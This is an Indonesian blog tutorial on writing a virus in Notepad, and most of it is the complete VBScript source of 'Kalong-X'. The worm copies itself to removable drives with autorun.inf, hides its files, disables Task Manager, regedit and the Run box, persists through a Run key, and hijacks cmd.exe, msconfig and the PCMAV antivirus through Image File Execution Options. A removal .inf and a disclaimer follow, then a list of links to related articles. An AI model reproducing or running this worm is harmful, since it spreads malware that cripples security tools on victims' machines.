Kita akan membuat virus via notepad. Pertama buka dulu notepad. Lalu ketik deh sekarang kode dibawah ini Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next
‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd
’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39
’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39
set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)
‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”
‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”
‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”
‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”
‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”
‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :
Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.ini adalah tutorial milik teman aku tapi tenang aja da kurubah sintak programnya di di bagian regisry nya kaliii
Cetak- SMADAV: Download Anti Virus SMADAV Pro
- Membasmi Virus VBS tanpa Anti Virus
- Download PC MEDIA 1.93 Build 1
- PCMAV: Download PC Media 1.92 Build 2
- Donwnload PCMAV 1.92 Build 1
- Download PC Media 1.91
- Download PC MEDIA 1.9 Build 5
- Download PC MEDIA 1.9 Build 4
- Lisensi Gratis Antivirus AVG 8.0 sampai 2018
- Download PC Media 1.9 Build 1
- Download PC Media 1.9
- Download PCMAV 1.8 Update Build2
- Download PCMAV 1.8 Update Build1
- Program Antivirus Palsu Memperdaya 30 Juta Korban
- PCMAV 1.8 + Engine ClamAV 0.94
- Download PC Media 1.7 Build 4
- Download PC Media 1.7 Build 3
- Download PCMAV 1.7 Update Build1
- Download PC Media 1.7
- Deteksi Virus PC dari Flash Disk
- KUMPULAN TIPS DAN TRIK MERONTOKAN VIRUS RONTOKBRO
- PC Media 1.6 Build 5
- Memburu Virus Rontokbro Dan Variannya Dalam Membasmi Dan Mencegah
- Teknik Membongkar Pertahanan Virus Lokal Menggunakan Visual Basic Script dan Text Editor Untuk Pencegahan
- Autorunme: PCMAV 1.6 Update Build 4
- Enkripsi WPA Jaringan Nirkabel Dipecahkan
- Hacking Tools 2007
- 7 Hack untuk Memaksimalkan Chrome
- Asus Kemas Key-Gen ke Dalam Recovery DVD
- Mengubah Nama Akun Administrator
- Non Aktifkan Tombol Windows
- Waspadai penipuan lewat email (phishing)
- Amankan User Account pada Windows
- Cara Membobol Password dan Solusi Menangkalnya
- Me-Reset Setting BIOS/CMOS yg Terpassword
- Memburu Virus Rontokbro Dan Variannya Dalam Membasmi Dan Mencegah
- Tips Bobol Hot Spot
- Seribu Cara Habisi Deep Freeze
- Bobol Password Windows Dengan Emergency Boot CD (EBCD)
- Hack Windows XP Password dengan Ophcrack
- Hack Windows XP (SP2) Passwords
- Pencurian Data pada Web Server
- Bobol Web dgn SQL Injection
- VB: Membuat Musik Player dengan VB
- Microsoft Rilis Internet Explorer 8 RC1
- EASEUS Partition Manager
- Office 14: Bocoran Screenshot Microsoft Office 14
- Lisensi Gratis Antivirus AVG 8.0 sampai 2018
- Google Chrome Beta 3 Telah Dirilis
- Windows Vista SP2 Beta Keluar Minggu Ini
- Membuat gambar ASCII dengan ASCII Chart Generator
- True Launch Bar
- Menangkap Tampilan Web dengan ScreenGrab
- Dapatkan Game Mario Bros & Zelda Gratis untuk PC
- Yahoo Messenger 9 Final
- Adobe Siap Luncurkan Aplikasi CS4
- Ubuntu: Linux Dalam Windows Tanpa Instalasi
- 39 Bocoran Screenshot Windows 7
- 7 Mesin Pencari Torrent Terbaik
- 5 Cara Berpindah Tab dengan Cantik di Firefox
- Desktop dan File Sharing Secara Remote dengan Gbridge
- Download PCMAV 1.7 Update Build1
- Asus Kemas Key-Gen ke Dalam Recovery DVD
- Download PC Media 1.7
- Daftar Aplikasi Gratis/Open Source Terbaik
- Theme Windows 7 untuk XP
- Mengoptimalkan Windows Explorer dengan 10 Add-On Gratis
Loading....
Artikel Lain :